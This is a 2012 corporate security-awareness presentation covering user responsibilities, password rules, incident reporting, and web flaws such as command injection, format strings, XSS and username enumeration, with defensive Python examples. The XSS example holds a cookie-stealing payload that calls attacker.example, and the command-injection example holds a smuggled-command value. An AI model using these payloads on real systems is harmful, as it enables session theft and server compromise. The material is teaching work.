
1 General Security Guidelines: Best Practices for Everyone. Presented at Nextbridge LHR C1, June 1, 2012

2 Topics we will cover in this presentation
- What is information
- What is information security
- What is risk
- Corporate security
- How we are linked with corporate security
- User responsibilities
- Web application vulnerabilities (case study)
- Questions

3 Who is at the centre of security? U R (you are)

4 What is information? Information is an asset which, like other important business assets, has value to an organization and consequently needs to be suitably protected.

5 Information can be created, stored, destroyed, processed, transmitted, used or misused, corrupted, lost, or stolen.

6 Information can be:
- Printed or written on paper
- Stored electronically
- Transmitted by post or by electronic means
- Shown on corporate videos
- Displayed or published on the web
- Verbal, spoken in conversations

7 What is information security?

8 Information security is:
- The quality or state of being secure, of being free from danger
- Recognized as essential to protect vital processes and the systems that provide those processes
- Not something you buy; it is something you do

9 Business survival depends upon information security. What information security does:
- Protects information from a range of threats
- Ensures business continuity
- Minimizes financial loss
- Optimizes return on investments
- Increases business opportunities

10 What is risk?
Risk: the possibility that a threat exploits a vulnerability in an asset and causes damage or loss to the asset.
Threat: something that can potentially cause damage to the organization, IT systems or network.
Vulnerability: a weakness in the organization, IT systems or network that can be exploited by a threat.

11 Typical threats and weaknesses:
- High user knowledge of IT systems
- Theft, sabotage, misuse
- Virus attacks
- Systems and network failure
- Lack of documentation
- Lapse in physical security
- Doing without knowing

12 Sources of threat

Source                   | Motivation                                                  | Threat
External hackers         | Challenge, ego, game playing                                | System hacking, social engineering, dumpster diving
Internal hackers         | Deadline, financial problems, disenchantment                | Backdoors, fraud, poor documentation
Terrorist                | Revenge, political                                          | System attacks, social engineering, letter bombs, viruses, denial of service
Poorly trained employees | Unintentional errors, programming errors, data entry errors | Corruption of data, malicious code introduction, system bugs, unauthorized access

13 Corporate security

14 Corporate security is the responsibility of everyone. Its elements: policy, people, risk management, legislation, compliance, technology.

15 User responsibilities
Good practices:
- Follow security procedures
- Wear identity cards and badges
- Ask an unauthorized visitor for their credentials
- Attend to visitors in the reception and conference room only
Avoid these:
- Bringing visitors into the operations area without prior permission
- Bringing hazardous or combustible material into a secure area
- "Piggybacking" (following an authorized person through an access-controlled door)
- Bringing and using pen drives, zip drives, iPods or other storage devices unless authorized to do so

16 User responsibilities
Good practices:
- Always use a password of at least 8 characters combining letters, numbers and special characters (*, %, @, #, $, ^)
- Use passwords that you can remember without writing them down
- Change your password regularly
- Use a password that is significantly different from your earlier passwords
Avoid these:
- Passwords that reveal your personal information, or that are words found in a dictionary
- Writing down or storing passwords
- Sharing passwords over the phone or by email
- Passwords that do not meet the complexity criteria above
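The rules on this slide can be enforced mechanically at password-change time. The following is an added example, not code from the presentation or from Nextbridge: it checks the stated length and character-class rules, catches dictionary words even when padded with digits and symbols, rejects personal information, and measures similarity to the previous password. The word list, the personal-information inputs and the 0.8 similarity threshold are assumptions for illustration (8 characters was the 2012 minimum on the slide; longer passphrases are stronger).

```python
import difflib
import re

# Constructed stand-in for a dictionary word list; a real check would load a full list.
DICTIONARY_WORDS = {"password", "welcome", "qwerty", "letmein", "summer", "nextbridge"}
# The special characters the slide names.
SPECIAL_CHARS = set("*%@#$^")
MIN_LENGTH = 8
# Assumed threshold: above this similarity ratio the new password is a trivial
# variation of the old one (for example only the final digit changed).
MAX_SIMILARITY = 0.8


def check_password(candidate, previous=None, personal_info=()):
    """Return the list of policy rules the candidate violates (empty means it passes).

    personal_info: strings such as the user's name or birth year that must not appear.
    previous: the user's last password, to enforce "significantly different".
    """
    problems = []
    lowered = candidate.lower()

    if len(candidate) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if not re.search(r"[A-Za-z]", candidate):
        problems.append("no letters")
    if not re.search(r"[0-9]", candidate):
        problems.append("no digits")
    if not any(c in SPECIAL_CHARS for c in candidate):
        problems.append("no special character from * % @ # $ ^")

    # Strip digits and symbols so "Password1@" is still recognised as the word "password".
    core = re.sub(r"[^a-z]", "", lowered)
    if core in DICTIONARY_WORDS:
        problems.append("based on a dictionary word")

    for item in personal_info:
        if item and item.lower() in lowered:
            problems.append("contains personal information (%s)" % item)

    if previous:
        ratio = difflib.SequenceMatcher(None, previous.lower(), lowered).ratio()
        if ratio > MAX_SIMILARITY:
            problems.append("too similar to the previous password")

    return problems


if __name__ == "__main__":
    for pw, kwargs in [
        ("Password1@", {}),
        ("abdul2012#", {"personal_info": ("Abdul",)}),
        ("Tr4in#Lhr!9", {"previous": "Tr4in#Lhr!8"}),
        ("Tr4in#Lhr!9", {}),
    ]:
        print(pw, "->", check_password(pw, **kwargs) or "OK")
```

The dictionary check works on the letters only, which is what defeats the common "Password1@" pattern that satisfies every character-class rule; the similarity check is what gives the "significantly different" rule teeth.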

17 User responsibilities
Good practices:
- Use internet services for business purposes only
Avoid these:
- Do not access the internet through dial-up connectivity
- Do not use the internet for viewing, storing or transmitting obscene or pornographic material
- Do not use the internet for accessing auction sites
- Do not use the internet for hacking other computer systems
- Do not use the internet to download or upload commercial software or copyrighted material

18 User responsibilities
Good practices:
- Use official mail for business purposes only
- Follow the mail storage guidelines to avoid your email being blocked
- If you come across any junk or spam mail: remove the mail, inform the security help desk, inform the server administrator, and inform the sender that such mails are undesired
Avoid these:
- Do not use your official ID for any personal subscription
- Do not send unsolicited mails of any type, such as chain letters or email hoaxes
- Do not send mails to clients unless you are authorized to do so
- Do not post non-business-related information to a large number of users
- Do not open mail or attachments that are suspected to carry a virus or that come from an unidentified sender

19 Report security incidents (IT and non-IT) to the helpdesk:
- By email to mis@nxb.com.pk
- By telephone: Ext#611
- Through the helpdesk system at http://mis.vteamslabs.com
Examples of IT incidents: mail spamming, virus attack, hacking, etc.
Examples of non-IT incidents: unsupervised visitor movement, information leakage, bringing unauthorized media.
Do not discuss security incidents with anyone outside the organization. Do not attempt to interfere with, obstruct or prevent anyone from reporting incidents.

20 A human wall is better than a firewall. Let's build a human wall around our firewall.

21 Best practices
- Ensure your desktop has the latest antivirus updates
- Ensure your system is locked when you are away
- Always store laptops and media in a lockable place
- Be alert while working on laptops during travel
- Download data only from known and trusted websites
- Do not use inline attachment reading in your email client
- Do not click any URL not known to you
- Ensure sensitive business information is under lock and key when unattended
- Ensure back-up of sensitive and critical information assets
- Verify credentials if a message is received from an unknown sender
- Always switch off your computer before leaving for the day
- Keep yourself updated on information security aspects

22 Do not let this happen

23 Web application vulnerabilities. No language can prevent insecure code, although there are language features which can aid or hinder a security-conscious developer.

24 Five evil sisters
- Remote code execution
- SQL injection
- Format string vulnerabilities
- Cross-site scripting (XSS)
- Username enumeration

25 Web application vulnerabilities: remote code execution. This vulnerability allows an attacker to run arbitrary, system-level code on the vulnerable server and retrieve any information it holds. Coding errors in how untrusted input is handled lead to this vulnerability. At times it is difficult to discover during penetration testing assignments, but such problems are often revealed during a source code review. When testing web applications it is important to remember that exploitation of this vulnerability can lead to total system compromise with the same rights as the web server itself. Rating: Highly critical
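The most common coding error behind this class in web code is building an operating-system command from request data and handing it to a shell. The following added example (not the presentation's code) shows that pattern next to the fix: validate the input against what it is supposed to be, and execute an argv list with no shell so the value can never be parsed as a second command. The hostname regex, the `nslookup` tool and the `example.com; id` payload are assumptions chosen for illustration.

```python
import re
import shlex
import subprocess

# Assumed validation rule: characters permitted in a DNS hostname, nothing else.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")


def vulnerable_command(host):
    """Build the command the way the vulnerable code does: by string concatenation.

    When this string is handed to subprocess with shell=True (or to os.system),
    /bin/sh parses it, so ';', '&&', '|' or '$(...)' inside `host` start a second
    command that runs with the web server's privileges.
    """
    return "nslookup " + host


def safe_argv(host):
    """Validate the input and return an argv list for the lookup tool.

    Raises ValueError for anything that is not a plausible hostname, so shell
    metacharacters never reach a process at all.
    """
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname: %r" % host)
    # An argv list is executed without a shell: `host` is exactly one argument,
    # whatever characters it contains.
    return ["nslookup", host]


def quoted_command(host):
    """Fallback when a shell really is required: quote the value so the shell sees one word."""
    return "nslookup " + shlex.quote(host)


def run_lookup(host):
    """Run the validated command without a shell and return (exit status, stdout)."""
    proc = subprocess.run(safe_argv(host), capture_output=True, text=True)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    payload = "example.com; id"          # constructed attacker input
    print(vulnerable_command(payload))    # nslookup example.com; id   -> two commands
    print(quoted_command(payload))        # nslookup 'example.com; id' -> one (failing) lookup
    try:
        safe_argv(payload)
    except ValueError as err:
        print("rejected:", err)
    print(safe_argv("example.com"))
```

Validation and no-shell execution are both worth keeping: the allow-list rejects junk early with a clear error, and the argv list means that even a gap in the regex cannot turn into command execution.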

26 SQL injection. SQL injection is a very old technique but it is still popular among attackers. It allows an attacker to retrieve crucial information from a web server's database. Depending on the application's security measures, the impact can vary from basic information disclosure to remote code execution and total system compromise. Rating: Highly critical

27 Format string vulnerability. This vulnerability results from the use of unfiltered user input as the format string parameter of functions that perform formatting in C or Perl, such as C's printf(). A malicious user can use the %s and %x format tokens, among others, to print data from the stack or possibly from other locations in memory. Format string attacks fall into three general categories: denial of service, reading, and writing. Rating: Highly critical
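The slide describes printf() in C; the same mistake, letting the user supply the format string rather than an argument to it, exists in Python and is the form a web developer is most likely to meet. The following is an added example and not the presentation's code: it shows the Python analogue of the "reading" category (attribute lookups inside str.format braces walk into an object the developer did not mean to expose) and of the "denial of service" category (a % template with too many conversions raises an exception), beside two safe forms. The User class and its password_hash attribute are constructed for illustration.

```python
import string


class User:
    """Constructed object with one sensitive attribute, standing in for a session or ORM record."""

    def __init__(self, name, password_hash):
        self.name = name
        self.password_hash = password_hash


def greet_vulnerable(template, user):
    """The caller's text IS the format string.

    str.format resolves attribute and index lookups inside the braces, so a
    template of "{user.password_hash}" reads data the developer never intended
    to expose, much as "%x" reads stack slots from printf().
    """
    return template.format(user=user)


def greet_percent_vulnerable(template, name):
    """Same bug with the % operator: a template with extra conversions raises TypeError
    (the denial-of-service category: a crash on attacker-chosen input)."""
    return template % name


def greet_safe(message, user):
    """The format string is a constant; the user's text is only ever an argument."""
    return "Hello {name}, you wrote: {msg}".format(name=user.name, msg=message)


def render_restricted(template, user):
    """If users must supply templates, string.Template substitutes only $identifiers from an
    explicit mapping: no attribute walking, and unknown names are left untouched."""
    return string.Template(template).safe_substitute(name=user.name)


if __name__ == "__main__":
    u = User("alice", "pbkdf2$abc123")
    print(greet_vulnerable("Hi {user.name}, hash={user.password_hash}", u))
    print(greet_safe("{user.password_hash}", u))
    print(render_restricted("Hi $name, hash=$password_hash", u))
```

The rule is the same in every language: the format string is code and belongs to the developer; anything that arrived over the network is an argument.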

28 Cross-site scripting. In the reflected form described here, the attack requires the victim to open a malicious URL crafted to look legitimate at first glance (stored XSS, where the payload is saved by the application, needs no crafted link). When the victim visits such a URL, the attacker can execute something malicious in the victim's browser: injected JavaScript, for example, runs in the context of the web site that has the XSS bug, with access to that site's cookies and session. Rating: Highly critical
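The following added example (not the presentation's code) builds the crafted URL the slide describes, then renders a search page from its query parameter two ways: reflecting the value unchanged, and HTML-escaping it. It places the value both in text content and inside an attribute, because the attribute context needs the quote character escaped as well. The site names, page fragments and payloads are constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed page fragments: the parameter lands in text content and in an attribute.
TEXT_TEMPLATE = "<p>Search results for: {q}</p>"
ATTR_TEMPLATE = '<input type="text" name="q" value="{q}">'


def query_param(url, name="q"):
    """Extract one query parameter from the URL the victim clicked (empty string if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def search_page_vulnerable(url):
    """Reflects the parameter into the page unchanged, so markup in it becomes live HTML."""
    q = query_param(url)
    return TEXT_TEMPLATE.format(q=q) + ATTR_TEMPLATE.format(q=q)


def search_page_safe(url):
    """HTML-escapes the value; quote=True also covers the attribute context."""
    q = html.escape(query_param(url), quote=True)
    return TEXT_TEMPLATE.format(q=q) + ATTR_TEMPLATE.format(q=q)


def crafted_url(payload):
    """What the attacker sends the victim: a legitimate-looking link with the payload URL-encoded."""
    return "https://shop.example/search?" + urlencode({"q": payload})


if __name__ == "__main__":
    # Constructed payloads: one for the text context, one that breaks out of the attribute.
    script = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
    attr = '" onfocus="alert(document.cookie)" autofocus="'
    for p in (script, attr):
        url = crafted_url(p)
        print(url)
        print("vulnerable:", search_page_vulnerable(url))
        print("safe:      ", search_page_safe(url))
```

Escaping is context-specific: html.escape is right for text and quoted attributes, but a value placed inside a script block, a URL or a CSS rule needs the encoding for that context instead.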

29 Username enumeration. Username enumeration is a weakness where the backend validation script tells the attacker whether the supplied username is valid. Exploiting it lets the attacker try many usernames and pick out the valid ones from the different error messages (or response times), which then feed password guessing and phishing. Rating: Critical
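The following added example (not code from the presentation) shows a login check written the enumerable way and the uniform way. Beyond the different messages the slide mentions, the enumerable version also returns early for unknown users, so it is measurably faster for them; the fix returns one generic message and hashes a dummy credential for unknown users so the work done is the same either way. The user store and the PBKDF2 parameters are constructed for the example.

```python
import hashlib
import hmac
import os
import secrets

ITERATIONS = 100_000


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: one real account.
USERS = {"bob": hash_password("hunter2")}

# A dummy credential hashed at startup so that a request for an unknown user
# still performs one full PBKDF2 computation (no timing difference to observe).
DUMMY_SALT, DUMMY_DIGEST = hash_password(secrets.token_hex(16))

GENERIC_ERROR = "Invalid username or password"


def login_enumerable(username, password):
    """The vulnerable pattern: a different message (and different work) per failure cause."""
    if username not in USERS:
        return False, "Unknown username"          # tells the attacker the name is not taken
    salt, digest = USERS[username]
    _, computed = hash_password(password, salt)
    if not hmac.compare_digest(computed, digest):
        return False, "Incorrect password"        # ...and this one confirms the name exists
    return True, "Welcome"


def login_uniform(username, password):
    """Same answer and same amount of hashing work whether or not the username exists."""
    salt, digest = USERS.get(username, (DUMMY_SALT, DUMMY_DIGEST))
    _, computed = hash_password(password, salt)
    # The `username in USERS` guard keeps a dummy-hash match from ever logging anyone in.
    ok = hmac.compare_digest(computed, digest) and username in USERS
    return ok, ("Welcome" if ok else GENERIC_ERROR)


if __name__ == "__main__":
    for user in ("bob", "carol"):
        print(user, login_enumerable(user, "wrong"), login_uniform(user, "wrong"))
    print(login_uniform("bob", "hunter2"))
```

The same discipline applies to registration and password-reset forms, which are the other usual places an application answers "that account exists".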

30 Case study. In this slide we will cover the following about the subject: what it is about, the background of the incident, the PDF reports (referred to), and conclusions.

31 Now it's your turn to speak

32 General Security Guidelines: Best Practices for Everyone. Designed and presented by Abdul Rehman, Senior System Administrator. Presented at Nextbridge LHR C1, May 17, 2012

